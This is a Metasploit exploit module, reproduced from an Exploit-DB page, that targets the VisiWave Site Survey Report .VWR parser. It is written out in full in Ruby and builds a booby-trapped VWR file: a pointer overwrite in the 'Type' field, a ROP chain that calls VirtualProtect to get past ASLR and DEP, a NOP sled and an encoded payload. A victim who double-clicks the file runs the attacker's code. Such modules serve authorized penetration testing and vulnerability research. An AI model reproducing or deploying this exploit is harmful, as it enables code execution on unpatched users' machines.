VisiWave – ‘.VWR’ File Parsing Trusted Pointer (Metasploit)

  • 作者: Metasploit
    日期: 2011-05-23
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/17317/
  • ##
    # $Id: visiwave_vwr_type.rb 12716 2011-05-25 13:57:12Z swtornio $
    ##
    
    ##
    # This file is part of the Metasploit Framework and may be subject to
    # redistribution and commercial restrictions. Please see the Metasploit
    # Framework web site for more information on licensing and terms of use.
    # http://metasploit.com/framework/
    ##
    
    require 'msf/core'
    
    class Metasploit3 < Msf::Exploit::Remote
    	Rank = GreatRanking
    
    	include Msf::Exploit::FILEFORMAT
    
    	def initialize(info = {})
    		super(update_info(info,
    			'Name' => 'VisiWave VWR File Parsing Vulnerability',
    			'Description'=> %q{
    				This module exploits a vulnerability found in VisiWave's Site Survey Report application.
    				When processing .VWR files, VisiWaveReport.exe attempts to match a valid pointer based on the 'Type'
    				property (valid ones include 'Properties', 'TitlePage', 'Details', 'Graph', 'Table', 'Text',
    				'Image'), but if a match isn't found, the function that's supposed to handle this routine
    				ends up returning the input as a pointer, and later used in a CALL DWORD PTR [EDX+10]
    				instruction.This allows attackers to overwrite it with any arbitrary value, and results code
    				execution.A patch is available at visiwave.com; the fix is done by XORing the return value as
    				null if no match is found, and then it is validated before use.
    
    				NOTE: During installation, the application will register two file handle's, VWS and VWR and allows a
    				victim user to 'double click' the malicious VWR file and execute code.This module was also built
    				to bypass ASLR and DEP.
    			},
    			'License'=> MSF_LICENSE,
    			'Author' =>
    				[
    					'mr_me',# original discovery & msf exploit
    					'TecR0c'# msf exploit
    				],
    			'Version'=> '$Revision: 12716 $',
    			'References' =>
    				[
    					[ 'OSVDB', '72464'],
    					[ 'URL', 'http://www.visiwave.com/blog/index.php?/archives/4-Version-2.1.9-Released.html' ],
    					[ 'URL', 'http://www.stratsec.net/Research/Advisories/VisiWave-Site-Survey-Report-Trusted-Pointer-%28SS-20'],
    				],
    			'Payload'=>
    				{
    					'Space' => 2000,
    					'BadChars'=> "\x00\x0a\x0d",
    				},
    			'Platform' => 'win',
    			'Targets'=>
    				[
    					[
    						'Windows XP SP3/Windows 7 SP0',
    						{
    							'Offset' => 3981, # offset to rop gadgets
    							'Pointer' => 0x007AF938,# POP R32; POP R32; POP R32; ADD ESP 50; RETN ("magic" pointer)
    						}
    					],
    				],
    			'Privileged' => false,
    			'DisclosureDate' => 'May 20 2011',
    			'DefaultTarget'=> 0))
    
    		register_options(
    			[
    				OptString.new('FILENAME', [ true, 'The file name.','msf.vwr']),
    			], self.class)
    	end
    
    	def exploit
    
    		# Allowing nulls in our rop chain is like giving gold to midas.
    		# instructions taken from the applications non aslr modules
    		# libcurl.dll, VisiWaveReport.exe and blah blah
    		rop_gadgets =
    		[
    			0x1001AFBD,# INC EBP; PUSH ESP; POP EDI; POP ESI; POP EBP; POP EBX; RET
    			0xc0fff333,# junk
    			0xc0fff333,# junk
    			0x000004cf,# lwSize 1231 bytes
    			0x100017DD,# POP ECX; RETN
    			0x10037a60,# Writeable address from .data of libcurl.dll
    			0x10011104,# POP EDX; RETN
    			0x00000040,# RWX for VirtualProtect()
    			0x10026E4D,# MOV EAX,EDI # POP EDI # RETN 
    			0x10002ac6,# RETN
    			0x10022641,# ADD EAX, 20; RETN
    			0x10022641,# ADD EAX, 20; RETN
    			0x10022641,# ADD EAX, 20; RETN
    			0x10022641,# ADD EAX, 20; RETN
    			0x10022641,# ADD EAX, 20; RETN
    			0x10022641,# ADD EAX, 20; RETN
    			0x004048B1,# XCHG EAX,EBP
    			0x1001BD3F,# POP EAX; RETN
    			0x10032048,# IAT Address - constant pointer to VirtualProtect()
    			0x1000FA4A,# MOV EAX,DWORD PTR DS:[EAX]; RETN
    			0x00657fd7,# XCHG EAX,ESI; RETN
    			0x1000af40,# PUSHAD; RET
    		].pack("V*")
    
    		# grab the pointer to our buffer
    		pointer = [target["Pointer"]].pack("V")
    
    		sploit = pointer# begin life in EDX
    		sploit << rand_text_alphanumeric(target["Offset"])# massive offset
    		sploit << rop_gadgets# rop chain
    		sploit << make_nops(300) # safe landing
    		sploit << payload.encoded# profit!
    
    		vwr_data = "FileType: SSREPORT\r\n"
    		vwr_data << "Product: VisiWave Site Survey, 1.6.5 Beta\r\n"
    		vwr_data << "FileVersion: 10\r\n"
    		vwr_data << "Item: Global Properties\r\n"
    		vwr_data << "Checked: 1\r\n"
    		vwr_data << "Type: #{sploit}\r\n"
    		vwr_data << "SurveyFile: C:\Program Files\VisiWave Site Survey\Samples\SampleData.vws\r\n"
    		vwr_data << "FloorPlanImageReport: C:\WINDOWS\Web\bullet.gif\r\n"
    		vwr_data << "DefaultOrientation: 0\r\n"
    		vwr_data << "Header:\r\n"
    		vwr_data << "Footer:\r\n"
    		vwr_data << "LeftMargin: 100\r\n"
    		vwr_data << "RightMargin: 100\r\n"
    		vwr_data << "TopMargin: 50\r\n"
    		vwr_data << "BottomMargin: 50\r\n"
    		vwr_data << "Item: #{rand_text_alpha(3)}\r\n"
    		vwr_data << "Checked: 1\r\n"
    
    		print_status("Creating '#{datastore['FILENAME']}'...")
    		file_create(vwr_data)
    	end
    
    end